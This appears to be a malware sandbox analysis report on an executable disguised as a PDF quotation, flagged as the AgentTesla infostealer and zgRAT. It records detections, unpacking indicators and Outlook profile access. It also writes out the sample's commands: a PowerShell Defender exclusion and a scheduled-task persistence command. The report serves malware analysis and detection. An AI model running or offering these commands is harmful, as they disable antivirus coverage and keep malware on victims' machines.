                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: UN-Quotation 70000000187366444_PDF.exe
                    Source: initial sampleStatic PE information: Filename: UN-Quotation 70000000187366444_PDF.exe
                    .NET source code contains very large array initializations
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.csLarge array initialization: .cctor: array initializer size 11627
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.csLarge array initialization: .cctor: array initializer size 11627
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.csLarge array initialization: .cctor: array initializer size 11627
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.csLarge array initialization: .cctor: array initializer size 11627
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 0_2_00B6CB240_2_00B6CB24
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 0_2_00B6EF700_2_00B6EF70
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 0_2_00B6EF620_2_00B6EF62
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_02D4F38010_2_02D4F380
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_02D4F6C810_2_02D4F6C8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064537F410_2_064537F4
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064567D110_2_064567D1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064534DC10_2_064534DC
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06454AF810_2_06454AF8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0645B1E010_2_0645B1E0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064992E810_2_064992E8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0649704010_2_06497040
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0649BC6810_2_0649BC68
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064964C810_2_064964C8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0649ACD610_2_0649ACD6
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0649C08510_2_0649C085
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064932A810_2_064932A8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662B2E810_2_0662B2E8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_066277B810_2_066277B8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662F0E810_2_0662F0E8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662492810_2_06624928
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_066219B010_2_066219B0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662B98810_2_0662B988
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06622AB810_2_06622AB8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662775710_2_06627757
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662004010_2_06620040
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662115910_2_06621159
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662B92410_2_0662B924
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCqhnAxCocASFEJkffVoTOfMxGoHZD.exe4 vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCqhnAxCocASFEJkffVoTOfMxGoHZD.exe4 vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTweenEngineAPI.dllD vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.295737787.0000000000318000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDisposit.exeF vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.304363401.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTweenEngineAPI.dllD vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCqhnAxCocASFEJkffVoTOfMxGoHZD.exe4 vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000000.294293276.0000000000AF8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDisposit.exeF vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.512249842.0000000000EF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exeBinary or memory string: OriginalFilenameDisposit.exeF vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: XrgnLg.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: XrgnLg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UN-Quotation 70000000187366444_PDF.exeVirustotal: Detection: 37%
                    Source: UN-Quotation 70000000187366444_PDF.exeReversingLabs: Detection: 19%
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile read: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeJump to behavior
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe"
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmpJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile created: C:\Users\user\AppData\Roaming\XrgnLg.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\tmp25F3.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/11@1/1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_01
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeMutant created: \Sessions\1\BaseNamedObjects\CidkzRETsJQhvv
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
                    Source: UN-Quotation 70000000187366444_PDF.exe, dP/Cb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: UN-Quotation 70000000187366444_PDF.exe, dP/Cb.csCryptographic APIs: 'CreateDecryptor'
                    Source: XrgnLg.exe.0.dr, dP/Cb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: XrgnLg.exe.0.dr, dP/Cb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.0.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: UN-Quotation 70000000187366444_PDF.exe, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: XrgnLg.exe.0.dr, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.0.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.5.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.3.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.2.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.1.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.7.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.9.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.a60000.1.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.13.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 0_2_00B61C58 push ebx; iretd 0_2_00B61C7A
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_02D46890 push FFFFFF8Bh; iretd 10_2_02D4689B
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06451518 push eax; retf 10_2_06451521
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0649F69B push 8B000003h; iretd 10_2_0649F6A4
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064932A8 push es; iretd 10_2_064941D0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064932A8 push es; iretd 10_2_064941E0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064918F6 push es; ret 10_2_06491910
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064918AA push es; ret 10_2_064918C4
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064918BD push es; ret 10_2_064918C4
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06492177 push edi; retn 0000h10_2_06492179
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06491909 push es; ret 10_2_06491910
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064941D9 push es; iretd 10_2_064941E0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064941D1 push es; iretd 10_2_064941D8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_066283D8 push 8B05F474h; retn 518Dh10_2_06628429
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06620040 push es; ret 10_2_06620DC8
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.847857536771399
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.847857536771399
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile created: C:\Users\user\AppData\Roaming\XrgnLg.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
